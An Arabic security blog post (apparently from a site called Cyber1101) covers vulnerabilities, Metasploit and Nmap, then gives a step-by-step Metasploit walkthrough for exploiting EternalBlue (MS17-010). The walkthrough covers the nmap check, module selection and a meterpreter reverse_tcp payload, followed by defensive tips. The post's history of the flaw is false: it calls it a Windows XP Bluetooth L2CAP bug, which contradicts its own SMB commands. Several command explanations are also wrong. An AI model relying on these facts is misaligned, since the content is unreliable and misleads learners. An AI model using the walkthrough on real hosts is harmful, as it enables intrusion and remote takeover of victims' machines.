اهلا ومرحبا بكم في مدونه : Cyber1101 انظم للمجتمع

Etherealblue exploit


ماهي الثغرات الامنيه

الثغرات الأمنية هي نقاط ضعف في نظام الحماية الإلكترونية يمكن للمهاجمين من خلالها الوصول إلى معلومات أو موارد غير مصرح بها، أو التلاعب بها أو تدميرها بدون إذن صريح. تشمل الثغرات الأمنية العديد من الأخطاء البرمجية والتصميمية التي يمكن استغلالها من قبل المهاجمين، مثل الحصول على كلمات المرور، أو الوصول إلى الملفات الحساسة، أو تنفيذ الأوامر الخبيثة، أو القيام بالتصيد الالكتروني، أو إرسال رسائل البريد الإلكتروني الخبيثة، أو تنفيذ هجمات السحابة، وغيرها من الهجمات الإلكترونية التي تتم عبر الإنترنت. يعتبر تحديد وإصلاح الثغرات الأمنية أمرًا حيويًا للحفاظ على سلامة البيانات والموارد المختلفة، وتجنب التعرض للهجمات الإلكترونية.


ماهي الثغرات في الويب و الاجهزة 

توجد العديد من الثغرات في الويب والأجهزة التقنية، ومن أشهرها:

  1. ثغرات الأمان الخاصة بالويب: وهي عبارة عن ثغرات في التطبيقات والمواقع الإلكترونية التي تسمح للمهاجمين بالوصول إلى المعلومات السرية والحساسة، ويشمل ذلك الهجمات القائمة على الاحتيال والاختراق والتصيد الاحتيالي والتهديدات الأمنية الأخرى.
  2.  ثغرات النظام الأساسي: وهي عبارة عن ثغرات في نظام التشغيل والتجهيزات الإلكترونية التي تسمح للمهاجمين بالوصول إلى الملفات الحساسة والمعلومات الشخصية.
  3.  ثغرات البرمجيات: وهي عبارة عن ثغرات في البرامج والتطبيقات التي تستخدم في الويب والأجهزة التقنية، والتي تتيح للمهاجمين الوصول إلى الموارد والأنظمة التي تستخدمها.
  4. ثغرات الشبكات: وهي عبارة عن ثغرات في الشبكات اللاسلكية والسلكية والتي تسمح للمهاجمين بالوصول إلى البيانات والمعلومات الحساسة.

هذه بعض الأمثلة العامة للثغرات في الويب والأجهزة، وتعتمد هذه الثغرات على العديد من العوامل مثل التصميم الأمني وطرق إدارة الأمان والاستخدام الآمن للتقنية.


ثغرات البرمجيات



ثغرات البرمجيات هي عبارة عن الأخطاء في كود البرمجة والتي يمكن استغلالها من قبل المهاجمين للوصول إلى المعلومات الحساسة أو تعطيل النظام أو تنفيذ أوامر خبيثة. وتتواجد هذه الثغرات في جميع أنواع البرمجيات سواء كانت تطبيقات الويب أو البرامج المثبتة على الأجهزة الشخصية، وتأتي هذه الثغرات عادة نتيجة الأخطاء البرمجية أو الاستخدام الغير الصحيح للتقنية.

يمكن أن تسمح ثغرات البرمجيات بتنفيذ الأوامر الخبيثة مثل حذف الملفات أو تعطيل النظام أو تغيير البيانات أو الحصول على الصلاحيات غير المصرح بها وغير ذلك من الأفعال الضارة. ولتفادي هذه الثغرات، يجب على المطورين الالتزام بأفضل الممارسات البرمجية وتطبيق معايير الأمان القياسية، كما يجب على المستخدمين تحديث البرمجيات المثبتة على أجهزتهم بانتظام وتجنب فتح الملفات من المصادر غير الموثوقة.


الميتاسبلويت



Metasploit هو إطار عمل مفتوح المصدر يستخدم لاختبار الاختراق والاستغلال الأمني. يتضمن Metasploit مجموعة من الأدوات والمكونات التي تساعد الباحثين عن الأمان والمخترقين في اختبار الأمان وتحديد الثغرات في الأنظمة والشبكات وتطبيقات الويب.

يسمح Metasploit أيضًا بتوليد البيانات الاصطناعية لاختبار وظائف الأمان وتقييم أداء الجدران النارية والأنظمة الأمنية الأخرى. يتضمن Metasploit العديد من الثغرات والمكونات الجاهزة التي يمكن استخدامها للوصول إلى الأنظمة والشبكات المستهدفة.

يستخدم Metasploit على نطاق واسع في تطبيقات الأمن السيبراني ومجالات اختبار الاختراق والبحث عن الثغرات وإدارة الأمن. ومع ذلك، يجب استخدامها بحكمة وفقًا للقوانين المحلية والدولية وللأغراض الشرعية فقط.


 nmap



Nmap (Network Mapper) هو أداة مفتوحة المصدر تستخدم لاستكشاف الشبكات وتحديد الأجهزة المتصلة بها ومسح الثغرات الأمنية في الأنظمة والأجهزة المستهدفة. يمكن استخدام Nmap لفحص المنافذ وتحديد الخدمات التي تعمل على الأجهزة المستهدفة، وكذلك للكشف عن الإصدارات البرمجية للأجهزة ونظم التشغيل.

تتضمن ميزات Nmap القدرة على الكشف عن الأجهزة المتصلة بالشبكة، وتحديد الخدمات التي تقدمها هذه الأجهزة، والتعرف على الإصدارات البرمجية ونظم التشغيل، وتحديد الثغرات الأمنية الموجودة في الأنظمة والأجهزة، وكذلك استخدام البرنامج النصي للتحكم في العمليات وتوليد تقارير مفصلة عن الفحص.

يستخدم Nmap على نطاق واسع في مجالات اختبار الاختراق وتحديد الثغرات وإدارة الأمن، ويعتبر أداة مهمة للمخترقين الأخلاقيين والباحثين عن الأمان ومديري الأنظمة والشبكات. ومع ذلك، يجب استخدامها بحكمة وفقًا للقوانين المحلية والدولية وللأغراض الشرعية فقط.

ثغرة Ethereal blue



ثغرة Ethereal blue هي ثغرة أمنية اكتشفت في نظام التشغيل Windows XP قبل أن يتم إصدار خدمة التحديث الأمني Service Pack 2. وتكمن هذه الثغرة في نظام الاتصالات السلكية واللاسلكية Bluetooth في النظام، ويمكن للمهاجمين استغلالها للوصول إلى جهاز الكمبيوتر وتنفيذ الأوامر الخبيثة.

وقد كانت الثغرة بسبب عدم التحقق من صحة الطلبات المرسلة عبر بروتوكول L2CAP الذي يستخدمه Bluetooth، حيث يمكن للمهاجمين إرسال طلبات مزيفة تحتوي على برامج خبيثة أو أوامر تشغيل بعيدة.

ولتجنب استغلال ثغرة Ethereal blue، ينصح باستخدام نسخة محدثة من نظام التشغيل Windows XP SP2 أو أحدث، وتعطيل خاصية Bluetooth إذا لم يكن ذلك مطلوبًا، وتجنب توصيل الأجهزة الغير موثوقة بجهاز الكمبيوتر. وفي حالة استخدام Bluetooth، يجب تثبيت جميع التحديثات الأمنية المتاحة وتشغيل جدار حماية النظام وبرامج مكافحة الفيروسات المحدثة.


استخدام Etherealblue في metasploit



  • نقوم بفحص الجهاز المستهدف للتاكد من وجود ثغرة Etherealblue 

nmap --script smb-vuln-ms17-010 -v 10.10.0.1

في هاذا الامر بفحص الجهاز المستضاف للتاكد من وجود ثغرة Etherealblue فيه، تم استخدام الطرفيه --script لتحديد cve الثغرة المستهدفه التي هي smb-vuln-ms17-010 ، اما -v فتعني ان نقوم بفحص معمق level 1

  • تشغيل الميتاسبلويت
service postgresql start

تعني تشغيل الخدمات في ال metasploit للاستمتاع بصلاحيات اوسع

msfconsole

تشغيل واجهة التحكم في metasploit

search eternalblue

  • البحث عن الاستغلالات المتاحه في Etherealblue
Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ exploit/windows/smb/ms17_010_psexec


الناتج للبحث السابق حيث يتواجد بعض الاستغلالات لثغرة Etherealblue ولتي سيتم استخدامها لاحقا

use exploit/windows/smb/ms17_010_eternalblue


في هاذا الامر قمنا بستخدام use لاحد الاستغلالات السابقه

options


الامر السابق يعني: اظهار معلومات هاذا الاستغلال

set rhosts 10.10.0.101


نقوم بتحديد ip الجهاز البعيد

set payload windows/x64/meterpreter/reverse_tcp


في هاذا الامر قمنا بستخدام حمولة من حمولات metasploit لاستخدامها في استهداف الجهاز البعيد

set lhost 10.10.0.1

set lport 4321


في هذا الامر نقوم بتحديد ال ip الخاص بجهازنا الفعلي و الامر الذي يليه حددنا البروتوكول المستخدم في الحموله


  • تبقئ لنا تشغيل الاستغلال 
ولذي يتم بلتالي

run

بعد تشغيل الاستغلال و الانتظار سيظهر لنا meterpreter Meterpreter هو عبارة عن عميل خبيث يتم تشغيله على جهاز الضحية بعد استغلال ثغرة أمنية باستخدام Metasploit. يعتبر Meterpreter أحد أهم الأدوات المتوفرة في Metasploit لأنه يتيح للمهاجم تنفيذ العديد من الأوامر والأدوات على جهاز الضحية دون اكتشافه.

يحتوي Meterpreter على العديد من الميزات التي تسمح للمهاجم بتنفيذ الأوامر، مثل الوصول إلى ملفات النظام، وتنفيذ البرامج، وتحميل وتنزيل الملفات، وفتح منافذ جديدة للأتصال بالنظام، وتغيير صلاحيات المستخدم والعديد من الميزات الأخرى.

بما أن Meterpreter يتم تشغيله في شكل عميل خبيث على جهاز الضحية، فإنه يتميز بالمرونة والقدرة على تخطي الأجهزة الأمنية بسبب قدرته على العمل على مستوى الذاكرة وتخطي الحواجز الأمنية.

يمكن للمهاجم استخدام Meterpreter في العديد من الهجمات الإلكترونية مثل الاستيلاء على بيانات المستخدمين والتحكم في جهاز الضحية وتنفيذ الأوامر عليه دون أن يعلم المستخدم بذلك. ولذلك يعتبر Meterpreter أحد أهم الأدوات في Metasploit.


كيف اعرف الثغرات ببرمجياتي او بجهازي



لمعرفة الثغرات في برمجياتك أو جهازك، يمكنك اتباع الخطوات التالية:

  •  تثبيت التحديثات الأمنية: يوصى بتثبيت جميع التحديثات الأمنية المتاحة لنظام التشغيل والبرامج المثبتة عليه. وتشمل هذه التحديثات إغلاق الثغرات الأمنية المكتشفة وتحسين أداء البرامج.
  • استخدام برنامج مكافحة الفيروسات: يوصى بتثبيت وتحديث برنامج مكافحة الفيروسات الموثوق به. ويمكن لبرامج مكافحة الفيروسات كشف البرمجيات الخبيثة والثغرات الأمنية في النظام ومنعها من التسبب في الأضرار.
  • تفعيل جدار الحماية: يوصى بتفعيل جدار الحماية في نظام التشغيل. ويعمل جدار الحماية على منع الوصول إلى النظام من الخارج ومنع البرامج الخبيثة من الوصول إلى النظام.
  •  استخدام أدوات فحص الثغرات: يمكن استخدام أدوات فحص الثغرات لفحص النظام والبرامج المثبتة عليه والبحث عن الثغرات الأمنية والمشاكل الأخرى. ومن الأدوات المتاحة، مثل Nmap وOpenVAS.
  • الحفاظ على نسخة احتياطية: يوصى بالحفاظ على نسخة احتياطية من البيانات الهامة في حالة حدوث أي مشكلة بالنظام أو البرامج المثبتة عليه.

باختصار، يجب تثبيت التحديثات الأمنية واستخدام البرامج المكافحة للفيروسات وتفعيل جدار الحماية واستخدام أدوات فحص الثغرات والحفاظ على نسخة احتياطية للبيانات الهامة للحد من خطر الثغرات الأمنية في النظام والبرامج المثبتة عليه.


كيف احمي نفسي من احتمال الاختراق



لحماية نفسك من احتمال الاختراق، يمكن اتباع الخطوات التالية:

  •  استخدام كلمات مرور قوية: يجب استخدام كلمات مرور قوية ومعقدة للحماية من الاختراق. يجب تجنب استخدام كلمات المرور السهلة والمتوقعة مثل تاريخ الميلاد أو الأسماء.
  •  تحديث البرامج والأنظمة: يجب تحديث جميع البرامج والأنظمة بانتظام لإغلاق الثغرات الأمنية المعروفة ولتحسين الأداء.
  •  تفعيل جدار الحماية: يوصى بتفعيل جدار الحماية في نظام التشغيل للتحكم في ما يدخل ويخرج من الجهاز ومنع التهديدات الخبيثة.
  •  الحذر من رسائل البريد الإلكتروني المشبوهة: يجب تجنب فتح الرسائل الإلكترونية المشبوهة وعدم تنزيل المرفقات الغير معروفة.
  •  استخدام برنامج مكافحة الفيروسات: يجب تثبيت برنامج مكافحة الفيروسات للكشف والحماية من البرامج الخبيثة والتهديدات الأمنية.
  • الحفاظ على نسخ احتياطية: يجب الحفاظ على نسخ احتياطية من البيانات المهمة للحماية من فقدان البيانات نتيجة لهجوم اختراق أو مشكلة في النظام.
  •  استخدام VPN: يمكن استخدام VPN لتشفير الاتصالات وحمايتها من الاختراق والتجسس.

باختصار، يجب استخدام كلمات مرور قوية وتحديث البرامج والأنظمة وتفعيل جدار الحماية وتجنب الرسائل الإلكترونية المشبوهة وتثبيت برنامج مكافحة الفيروسات والحفاظ على نسخ احتياطية واستخدام VPN لحماية الاتصالات.

إرسال تعليق

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.